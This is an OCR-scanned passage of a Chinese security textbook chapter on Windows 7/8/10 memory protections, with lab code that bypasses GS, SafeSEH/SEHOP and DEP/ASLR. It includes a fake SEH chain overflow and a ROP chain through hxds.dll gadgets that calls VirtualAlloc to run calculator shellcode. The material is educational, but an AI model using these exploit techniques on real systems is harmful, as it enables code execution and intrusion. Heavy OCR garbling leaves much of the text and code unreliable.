0018FF44 |Leose12AF 返回 到 GSvirtual.m ERARHHE hai. tmaincrtstartur 
0018FF48 |p089000001 
DOOrr | 093210F6 


图 17-29 调试 器 中 栈 布 局 
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因此 直接 履 善 虚 呆 数 表 指针 为 栈 上 可 控 地 址 ,同时 伪造 虚 图 数 地 址 , 即 可 在 _security_ 
cookie 检测 前 支持 程序 EIP, 如 图 17-30 所 示 。 


zdBXxÜCVxSB" 







ecx, lecx] 
z5TAEFENx85" 
£ÜJXzDDix 33^ 
— " 







www.pku-exploit.com 





x903x 90x 90*x905x90 
图 17-30 成 功 绕 过 GS 


17.6.2 SafeSEH 及 SEHOP 测试 


1. SafeSEH 测试 

测试 SafeSEH 在 Windows 8 操作 系统 的 有 效 性 。 编 写 一 段 测试 代码 ,试图 通过 和 窗 童 
SEH 劫持 程序 流程 ,并 开局 SafeSEH。 

测试 代码 如 下 。 


# include < stdio. h> 
# include < Windows. h> 
char shellcode[]= "" 
int MyException() 
{ 
printf("Exception!"); 


return 0; 
] 
void cp(char* src) 
{ 


char test[100]; 
memcpy( test, shellcode, sizeof(shellcode)); 


ENEETI 
src[1] = 'b'; 
__except(MyException()){}; 
} 
void main() 
{ 
cp(shellcode) ; 
} 


HT EI src 的 指针 ,致使 在 "mov [eax 十 1,62” 处 出 现 了 异 第 。 可 以 看 到 此 时 eax 
为 90909090 ,显然 是 一 个 非法 地 址 ,如 图 17-31 所 示 。 而 此 时 栈 上 的 SEH Handler 被 修改 
为 其 他 地 址 。 但 由 于 SafeSEH ,程序 流程 并 没有 被 劫持 到 该 地 址 上 去 ,而 是 直接 抛 出 异常 。 
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DD40105F BS 1 

00401063 . CT45 FC FFFFFFFF "na | PTR SS: [EBI] 
00401064 . EB 10 MI SHDRT iar Re 其 D04010TC 
OOA0106C  . ES SFFFFFFF Il safteseh . . 00401000 
00401071 


SENE 


90909090 li 
30908090 ， 


in Z| 
3. SOSDSEEB FS Pointer to next SEH record 
OO13FF2C 00401020 8. SE handler 
0013FF30 90809090 [= 





图 17-31 dain Zs PWS BR SHE) 


2. SafeSEH 及 SEHOP 脆弱 性 测试 
下 面 是 一 个 通过 伪造 SHE 链 绕 过 SEHOP 测试 用 例 。 


+ include "stdafx.h" 
# include < string. h> 
+ include < Windows. h> 
char shellcode[ ] = 


Lan eia 

"\x14\xFF\x18\x00" // 指 回 最 后 一 个 SEH 记录 块 
"\x12\x10\x12\x11" //pop pop retn 地 址 

M aaran ji / /MessageBox 机 器 码 和 NOP 
"\ xFF\xFF\xFF\xFE" // 最 后 一 个 SEH 链 指针 
"\x91\x51\x79\x77" 


DWORD MyException( void) 

{ 

printf("There is an exception"); 
getchar(); 

return 1; 

} 

void test(char * input) 

{ 

char str[200]; 
memcpy(str, input, 426) ; 


int z; 


__ except (MyException() ) 


int main(int argc, _TCHAR* argv[ ]) 
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{ 

HINSTANCE hInst = LoadLibrary("NOSafeSEH. dll"); 
char str[200]; 

test(shellcode); 

return 0; 


} 


上 面 代码 中 ,在 test RAP FF TE DE P DA dii h US i «xx E Xe Eo II PH uu oro Ab E R SCT 
针 来 达到 利用 目的 。 由 于 开启 了 SEHOP, 因 此 在 覆盖 的 缓冲 区 上 实现 了 一 个 伪造 的 SEH 
链 , 以 此 统 过 对 SEH 链 合 法 性 检查 。 在 跳板 指令 方面 ,选取 了 NOSafeSEH. dll 中 的 指令 组 
^4 pop pop retn”。 程 序 执行 过 程 中 通过 一 个 除 零 寞 第 , 转 入 跳板 指令 地 址 上 ,然后 执行 
Shellcode。 
第 一 步 确 认 FinalExceptionHandler 地 址 ,用 OD 加 载 程序 之 后 ,在 栈 上 可 以 找到 最 后 
-个 SEH 结构 , 即 可 确定 FinalExceptionHandler 地 址 ,如 图 17-32 Bra. KH SEH 结构 在 
栈 上 地 址 为 0x18FFC4。 其 中 FinalExceptionHandler 4§ [p] Hh ib AW 0x77795191, 






BUISFFDL UUISFFYL 
0818FFCO0 FFFFF888 
8618FFCh FFFFFFFF 
8818FFC8 7779519 
8818FFCC h1bE2365C 
8818FFD8 88880888 


图 17-32 ”调试 硕 中 观察 履 靖 SEH(2) 





ni 

= 
=| 
7m 


SEH 链 最 后 一 项 的 标识 









J FinalExceptionHandler 指 向 的 地 址 





然后 依照 上 面 找到 的 FinalExceptionHandler 地 址 ,伪造 一 个 SEH B£, 38 i $8 5 53 2X 
冲 区 起 始 地 址 最 近 的 SEH 结构 ,本 次 实验 中 地 址 为 0x0018FE54, 如 图 17-33 所 示 。 并 改写 
0x0018FE58 地 址 上 的 值 指向 “POP POP RETN” 跳 板 地 址 。 为 了 绕 过 SEHOP 检测 ,需要 
将 0x0018FE54 写 和 人 一 个 SEH 指针 指 问 栈 上 的 某 可 控 地 址 ,该 地 址 上 写 入 一 个 伪造 的 
Final SEH 结构 。 


aa ET jj] CEFEFEREPFTEPEPXPFYN 


8818FD78 88888808 
8818FD7C 9 89 09 09 8 
8818FD8 80 9 09 09 09 0 
8818FD84 989 09 09 B 
8818FDB88 9 09 09 09 D 
8818FDBC 9 89 09 09 B 
8818FD9 6 9 09 09 09 0 
8818FD95 96969696 
8818FD98 9 89 89 89 B 
8818FD9C 9 89 09 09 8 
BB18FDf 8 9 09 09 09 0 
ee L OY ay oyd 013 


































距离 缓冲 区 起 始 地 址 最 近 的 | 


| 





17-33 $RP SEH 链 


最 后 加 入 弹 MESSAGEBOX 的 机 器 码 和 占 位 的 NOP 指令 后 ,构成 的 Shellcode 结构 如 
图 17-34 所 示 。 

将 栈 缓 冲 区 布局 好 之 后 ,由 于 伪造 的 SEH 链 完 全 满足 检测 逻辑 ,因此 SEHOP 检测 
SEH 链 合 法 性 可 以 通过 。 在 异常 产生 后 ,会 跳 人 0x11121012 跳板 指令 处 ,进而 执行 
Shellcode。 整 个 流程 如 图 17-35 所 示 。 
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伪造 的 异常 记录 地 址 pop pop ret 地 址 
216 个 0x90 45 4 字 节 8 个 0x90 





弹 窗 机 器 码 windows8 版 SHE 链 最 后 标识 终极 异常 处 理 函 数 地 址 
191*r TH fp 17 x90 4^r ^u A^g y] 






\xFC\x68\---\x57\XF8\x90 





图 17-34 Shellcode 结构 


0x11121012 


POP EAX 


POP EAX 
RET NOP NOP NOP NOP 
NOP NOP NOP NOP 
0x11121012 | 
NOP NOPINOP NOP 
NOP NOPINOP NOP 
Shellcode 
一 一 一 执行 流程 L OxFFFFFFFF 


Ntdll!FinalExceptionHandle 











KASEH 
SEH handle 
开始 































一 一 SEH 链 





17-35 ži} SEHOP 流程 图 


17.6.3 DEP 测试 


1. DEP 有 效 性 测试 

编写 一 段 测试 代码 ,开启 链接 选项 NXCOMPA T 38 it 78 s de RR [p] Hb db; 并 且 利 用 
hxds. dll 中 的 jmp esp 作为 跳板 指令 ,直接 在 栈 上 执行 Shellcode, 观 察 测试 效果 ,测试 代码 
WF. 


# include < stdio. h> 
+ include < Windows. h > 


char shellcode[500]; 
char nop[ ] = {}; 
char exec calc[] = { +: }; 


int create shellcode(char * buf ) 
{ 
unsigned int rop gadgets[] = { 
0x51c4a9f3, //jmp esp 
); 
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if(buf != NULL) { 
memcpy(buf, nop, sizeof(nop)); 
memcpy(buf + sizeof(nop) - 1, rop gadgets, sizeof(rop gadgets)); 
memcpy( buf + sizeof(nop)- 1+ sizeof(rop gadgets),exec calc,sizeof(exec calc)); 


- 
return sizeof(rop gadgets); 
} 
void gs(char * src) 
{ 
char test[100]; 
memcpy( test, shellcode, sizeof(shellcode)); 
} 
void main() 
{ 
create_shellcode(shellcode) ; 
LoadLibrary("hxds.d11"); 
gs(shellcode); 
} 


DEP 测试 效果 如 图 17-36 所 示 。 


C | rop_vertification.exe 已 停止 工作 
Windows 可 以 联机 检查 该 问题 的 解决 方案 ， 


INTs 
INT3 





17-36 DEP 测试 效果 


如 图 17-36 所 示 ,图 数 返 回 时 , 栈 顶 指针 为 0x51C4A9F3 ,指向 hxds. dll 模块 中 的 JMP 
ESP 指令 。 栈 地 址 Ox00CSFEI8 FiA Shelleode, 4fA77 FIFE ELFR OWT. FER AHR 
常 并 crash, 

2. DEP 脆弱 性 分 析 

下 面 代码 为 一 段 通过 栈 上 的 ROP 绕 过 Windows 8 的 DEP 测试 。 编 译 链接 时 ,同时 开 
lif ASLR Al DEP, it ROP 利用 了 hxds. dll 组 件 , 该 组 件 为 Office 系列 程序 中 的 一 个 
组 件 ,由 于 未 开启 ASLR ,因此 一 直 受 攻击 者 利用 绕 过 其 他 进程 的 ASLR 保护 。 


# include < stdio. h> 

i include < Windows. h> 
char shellcode[ 500]; 
char nop[] = { --}; 

char exec calc[] = (--; 


int create_shellcode(char * buf ) 
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unsigned int rop gadgets[] = { 
Ox51beceab, // POP EDI RETN [hxds. dll] 
O0x51bd115c, // ptr to &VirtualAlloc() [IAT hxds. dll] 
0x51c3098e, // MOV EAX, DWORD PTR DS:[EDI] RETN [ hxds. dll] 
0x51c39648, // XCHG EAX, ESI RETN [ hxds. dll] 
0x51c391cd, // POP EBP RETN [ hxds. dll] 
0x51c4a9f3, // jmp esp [hxds. dll] 
0x51c394ac, // POP EBX RETN [ hxds. dll] 
0x00000001, // 0x00000001 -> ebx 
0x51bfa993, // POP EDX RETN [ hxds. dll] 
0x00001000, // 0x00001000 -> edx 
0x51becb96, // POP ECX RETN [hxds. d11] 
0x00000040, // 0x00000040 - > ecx 
0x51bf212d, // POP EDI RETN [ hxds. dll] 
0x51c55c46, // RETN [hxds. dll] 
0x51c433d7, // POP EAX RETN [hxds. dll] 
0x90909090, // nop nop … 
0x51cO0a4ec, // PUSHAD RETN [hxds. d11] 
); 
if(buf != NULL) ( 
memcpy (buf, nop, sizeof(nop)); 
memcpy(buf + sizeof(nop) - 1, rop gadgets, sizeof(rop gadgets)); 
memcpy(buf + sizeof(nop)-1-* sizeof(rop gadgets),exec calc,sizeof(exec calc)); 
); 
return 1; 
} 
void cp(char * src) 
{ 
char test[100]; 
memcpy( test, shellcode, sizeof (shellcode) ); 
} 
void main( ) 
{ 
create shellcode(shellcode) ; 
LoadLibrary("hxds. dll"); 
cp(shellcode) ; 


HTA is WW AE T shellcode 部 分 。cp RRUFE A Hh K tit Hild. Fa PITA DEP 和 
ASLR ,用 户 无 法 直接 在 栈 上 执行 数据 。 因 此 利用 了 hxds. dll 中 的 指令 片段 ,来 构造 了 
ROP ,通过 调用 VirtuallAlloc 在 栈 上 分 配 一 段 可 执行 区 域 ,然后 再 执行 后 面 的 Shellcode。 
调试 过 程 中 关键 部 分 如 图 17-37 和 图 17-38 所 示 。 

可 以 看 到 ,在 ROP payload 执行 前 , 栈 上 地 址 为 不 可 执行 ,ROP payload 执行 过 后 ,该 段 
地 址 已 经 变 得 可 以 执行 了 了。 图 17-39 所 示 为 栈 上 执行 数据 调试 图 。 图 17-40 所 示 为 成 功 执 
ÍT shellcode 并 弹出 计算 天 。 
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8:000> laddress G9b5faad 
ProcessParametrs 00d10fað in range 00d10000 00d24000 
Environment 86d105e8 in range 800d10000 00d24000 
00a60000 : O00b5d000 - 00003000 
Type 00020008 MEM PRIVATE 


Protect 808000004 PAGE READWRITE 
State 00001000 MEM COMMIT 
Usage RegionUsageStack 
Pid.Tid 884.ac4 





图 17-37  shellcode 执行 前 


0:000» laddress OOGb5faaó 
ProcessParametrs OO0dlOfa0 in range 00d10000 00d24000 
Environment @@d105e8 in range 00d10000 00d24000 
0023650000 : OOb5fO00 - 00001000 

Type 00020000 MEM PRIVATE 
Protect 00000040 PAGE EXECUTE READWRITE| 
State 00001000 MEM COMMIT 
Usage RegionUsagelsVAD 





图 17-38 shellcode 执行 后 


nop 


eax-00b5f000 ebx-00000001 ecx-88b5fa68 edx-//b16954 esi-/6/e1590 edi-51c55c46 
eip-08bb5faa?2 esp-880b5fa9c ebp=51c4a9T3 iopl-8 nv up ei pl zr na pe nc 
55-0023 ds=0023 es=0023 fs=003b gs=0000 ef1-00000246 

nop 


eax=00b5F800 ebx=00000001 ecx=00b5Ta60 edx=/7b16954 esi=/6/7e1590 edi=51c55c46 
elp=00b5faa3 esp=00b5fa9c ebp-51c4a9f3 iopl=0 nv up ei pl zr na pe nc 
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef1=00000246 
OObb5faa3 9 nop 

0:000» p 

eaxszOB0b5f000 ebxsO00000001 ecxz00b5fa60 edx=/7b16954 esi-7/6/e1590 edis51c55c46 
eip-00b5faa4 esp-ü0b5fa9c ebp-51c4a913 iopl-8 nv up ei pl zr na pe nc 
cs=@01b ss=0023 ds=0023 es=0023 fs=003b gs=0000 ef 1=00000246 
egbo5faad e9960000008 jmp 080b5tfb3f 





图 17-39 栈 上 执行 数据 调试 图 


C:\Users\hello\Desktop\DepBypass.exe 


a 
Bev) SSE) 帮助 (H) 


0000  G000 后 虹 的 的 
63 
aano Geo  G0000 pepo 
31 








OTA | Mod 
(e tH stalua 
加 八进制 |L L 

OZH RoL || RoR | 











em | Or | xor 
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图 17-40 ”成功 执行 shellcode 并 弹出 计算 器 
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17.6.4 ASLR 测试 


RE Windows 8 系统 引入 Force ASLR, 但 目前 还 未 对 所 有 应 用 程序 启用 ,攻击 者 依然 
n] LA fa BIET ROTER ASLR 的 DLL 组 件 绕 过 当前 进程 的 ASLR 防护 。 关 于 这 一 测试 ,参见 
17.5 $ DEP 脆弱 性 测试 。 该 测试 用 例 中 ,程序 加 载 了 一 个 未 开局 ASLR 的 模块 hxds. dll. 
但 其 他 DLL 和 本 进程 的 映像 都 开启 ASLR ,最 终 通 过 hxds. dll 的 固定 指令 地 址 ,构造 ROP 
链 , 同 时 绕 过 本 进程 的 ASLR fl DEP. 

i aot He Hk it Be. SEE ASLR 在 某 些 漏洞 场景 下 ,在 Windows 8 环境 下 依然 可 以 利 
用 。 一 种 方法 就 是 合理 的 布局 堆 块 ,并 将 对 象 成 功放 置 在 某 区 域内 ,漏洞 触发 后 ,就 可 
以 成 功 谈 取 对 和 象 中 的 关键 数据 ,如 虚 图 数 表 地 址 ,进而 可 以 计算 出 模块 基地 址 , 即 可 纸 
it ASLR, 


17.7 Windows 10 安全 保护 新 特性 


17.7.1 CFG 控制 流 防护 机 制 


微软 通过 不 断 问 Windows 操作 系统 引进 新 的 安全 特性 ,增强 攻击 者 对 于 内 核 漏 洞 利用 
的 难度 。Windows 10 中 为 了 保障 系统 安全 在 编译 时 使 用 GS、 SAFSEH 保障 ,在 运行 时 使 
用 DEP、SEHOP、ASLR 实现 对 系统 内 存 的 剑 护 。 队 此 之 外 ,Windows 10 通过 新 增 CFG $2 
制 流 防 护 机 制 增强 了 对 系统 的 内 存 保护 。CFG 可 提 局 系统 省 洞 防御 的 能 力 。 

攻击 者 通过 缓冲 区 溢出 等 漏洞 ,可 通过 不 同 的 手段 实现 在 不 破坏 原 娘 程 厅 功能 的 基础 
上 ,在 运行 时 将 目 己 的 代码 注入 。 通 常 依 徘 修改 内 存 中 的 指针 将 程序 跳 到 超出 原始 预计 执 
行 流程 。CFG 可 以 对 加 接 调 用 指令 进行 限制 ,为 了 实现 这 一 功能 , 宕 要 操作 系统 中 编 详 环 
境 和 运行 环境 的 配合 。 编 境 融 需要 完成 以 下 功能 。 

(1) 在 代码 编译 过 程 中 ,对 其 加 入 轻 量 级 的 安全 检查 。 

(2) peius hts qe ciini 目标 。 

运行 需要 完成 以 下 功能 ,这 些 功能 由 系统 内 | | 
核 提 供 。 IlsValidarget(cb OFA L S 

E | m TerminateProcess(); 

CD 持续 有 效 的 运行 状态 用 于 区 别 是 否 为 有 

(2) 实现 对 于 图 数 是 否 为 有 效 调 用 的 辨别 。 | 

如 图 17-41 所 示 的 test ER Xt. Is Valid Target 
PK DOSE TTE ACH] [n] 38] eR ic He Bb E TI TS. M 
tz 试图 修改 test EE 数 中 回调 的 Hb d n J.A 统 会 ii m Big dl 


P 
cb(): 
j 


监控 制止 这 类 行 为 s return TRUE; return FALSE: 
CFG 机 制 的 基本 原理 就 是 操作 系统 对 于 间 

m | — | CallBackilZ FH BE CallBacki 周 | Ji 

接 调用 的 无 效 目 标 进行 抑制 。 在 图 17-42 中 , 红 | Cans EC 





线圈 出 的 部 分 表示 程序 在 编译 期 间 并 没有 确定 
其 地 址 ,攻击 者 可 以 通过 修改 指 问 地 址 实施 攻 图 17-41 Windows10 CGF 机 制 示 意图 
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WS XX B Jee 38 Ae we FH 


ib. CFG 会 检查 所 有 跳 转 地 址 的 有 效 性 。 MU Pc MEM 
CFG 可 以 让 C++ 4a tE at E — E iil XC LE TE AY fg 1A fV a elai 

码 的 安全 性 ,用 来 保障 在 进行 函数 间接 跳 转 时 ,只 会 跳 转 

到 规定 函数 的 入 口 ,CFG 有 效 限 制 了 程序 毅 泪 时 的 跳 转 

点 ,增强 了 系统 安全 性 。 


17.7.2 字体 防护 增强 


为 了 保证 字体 引擎 性 能 ,微软 一 直 将 字体 引擎 放 在 内 核 模 式 。 由 于 Windows 内 核 字 体 
引擎 复杂 度 高 , 且 位 于 内 核 中 ,字体 引擎 极 容易 被 攻击 者 设 定 为 主要 的 攻击 目标 。 攻 击 代码 
可 以 在 用 户 浏 览 文档 中 的 远程 字体 文件 时 ,将 攻击 代码 放 和 人 到 Windows 系统 内 核 执 行 , 达 
到 绕 过 Windows 安全 防护 机 制 的 目的 。 

Windows 10 中 通过 禁用 非 系统 字体 ,防止 远程 非法 字体 执行 。Windows 8 中 ,系统 可 
以 通过 调用 API 对 系统 中 进程 的 Flags 域 进行 设 定 , 这 些 设 定 可 以 更 改 , 如 句柄 踢 制 检查 、 
ALSR 等 机 制 。 在 Windows 10 中 引入 名 称 为 ProcessFontDisablePolicy 的 选项 ,该 选项 可 
设 定 进程 是 否 禁 止 加 载 非 系 统 的 字体 。 在 Windows 10 中 ,系统 通过 调用 以 下 4 PS BR CE 
现 对 于 字体 文件 的 加 载 。 





图 17-42 地址 未 确定 的 函数 


PUBLIC PFTOBJ::bLoadFonts 
PUBLIC PFTOBJ::hLoadMemFonts 
PUBLIC PFTOBJ: :bLoadRemoteFonts 
DEVICE PFTOBJ::bLoadFonts 


上 述 的 4 个 函数 实现 在 不 同 场 景 下 加 载 字 体 。 在 上 述 的 函数 中 ,内 核 将 调用 
vLoadFontFileView 函数 来 加 载 字 体 文件 视图 对 象 ,并 将 字体 文件 的 数据 映射 到 内 核 内 存 
中 再 进行 处 理 。 如 以 下 代码 所 示 , 在 函数 调用 vLoadFontFileView 时 ,需要 先进 行 检 查 , 首 
先 通 过 GetCurrentProcessFontLoadingOption 调用 获取 字体 加 载 组 和 的 选项 ,通过 这 个 郴 
数 获得 PROCESS MITIGATION FONT DISABLE POLICY 结构 ,这 个 结构 中 bito 
示 是 否 禁 用 非 系统 字体 ,bitl 表示 是 否 对 非 系统 字体 进行 审计 。0 表示 不 审计 ,不 禁用 。 
表示 审计 但 不 禁用 ,2 表示 审计 并 禁用 。 人 然后 通过 GetFirstNonSystemFontPath icon 
的 文件 列表 ,在 加 载 过 程 中 会 将 获得 的 载 和 字体 和 系统 字体 进行 对 比 。 接 着 系统 根据 选项 
判断 对 一 个 非 系 统 字体 是 仅 进 行 审 计 还 是 拒绝 加 载 。 


FontLoadingOptions = GetCurrentProcessFontLoadingOption(); 
if ( FontLoadingOptions == 2) 
{NonSystemFontPath = GetFirstNonSystemFontPath(FontFilePathNames, FontFileCount); 
if ( NonSystemFontPath ) 
{ LogFontLoadAttempt(FONT LOAD NORMAL, NonSystemFontPath, TRUE); 
return FALSE; 

} 
} 
else if ( FontLoadingOptions == 1) 
{NonSystemFontPath= GetFirstNonSystemFontPath(FontFilePathNames, FontFileCount) ; 


第 17 章 ”新 型 操作 系统 内 存 安全 机 制 分 


if ( NonSystemFontPath ) 
LogFontLoadAttempt(FONT LOAD NORMAL, NonSystemFontPath, FALSE); // log only 
} 


除了 通过 禁用 非 系 统 字 体 保 证 字体 引擎 的 安全 外 ,Windowsl0 还 通过 隔离 用 户 模 式 字 
体 引 擎 增强 其 安全 功能 , 即 加 入 用 户 模 式 字 体 驱 动 (User Mode Font Driver, UMFD) 机 制 。 
在 对 Windows 系统 进行 修改 时 ,需要 对 在 内 核 中 运行 的 字体 引擎 进行 着 慎 的 检查 ,否则 会 
导致 严重 的 系统 月 演 或 程序 异常 。 为 了 减 小 对 于 内 核 字 体 引 擎 修改 高 来 的 副作用 ， 
Windows 10 通过 建立 用 户 模式 和 内 核 模式 的 字体 引擎 交互 机 制 ,将 在 内 核 字 体 引 擎 中 的 字 
体 驱 动 引擎 移植 到 用 户 模式 下 ,这样 字体 引擎 可 以 在 隔离 的 用 户 模式 进程 中 运行 。 在 这 样 
的 策略 下 ,攻击 者 只 能 控制 到 被 隔离 的 用 户 进程 ,而 无 法 直接 控制 操作 系统 内 核 。 


17.8 "ka 


du XS Windows 操作 系统 的 内 存 安 全 机 制 进 行 了 人 分析。 首先 介绍 了 Windows 7 
通过 使 用 GS 机 制 .ASLR HLH], DEP 机 制 和 SafeSEH 安全 机 制 如 何 保障 系统 内 存 安全 。 
其 次 介绍 了 与 Windows 7 相 比 较 ,Windows 8 如 何 对 GS 机 制 .ASLR 机 制 .DEP 机 制 进行 
改进 ,从 而 增强 Windows 8 的 安全 防护 。 并 再 次 分 析 Windows 7 和 Windows 8 系统 中 内 
存 保 护 机 制 存 在 的 脆弱 性 ,介绍 了 人 Windows 7 和 Windows 8 系统 中 内 存 保护 机 制 存 在 的 潜 
在 风险 ,为 读者 寻找 针对 Windows 7 和 Windows 8 系统 内 存 机 制 的 攻击 方法 提供 参考 。 然 
后 者 重 介 绍 了 如 何 利 用 Windows 8 中 的 内 存 机 制 脆弱 性 设计 攻击 代码 ,实现 对 Windows 8 
系统 的 攻击 。 最 后 介绍 了 Windows 10 中 有 特色 的 安全 保护 机 制 。 


习题 17 


. GS 保护 机 制 为 用 户 提 供 了 对 抗 哪 类 攻击 的 防护 措施 ? 

. fal SafeSEH 两 种 验证 机 制 的 区 别 。 

. ASLR 的 加 载 规 律 是 什么 ? 

. Windows 7 通过 哪些 技术 实现 其 内 存 保 护 机 制 ? 

. Windows 8 内 存 保护 机 制 中 对 ASLR 机 制 的 改善 体现 在 哪些 方面 ? 

. Windows 10 中 的 CFG 在 编译 时 和 运行 时 分 别 对 系统 作 了 哪些 安全 增强 ? 
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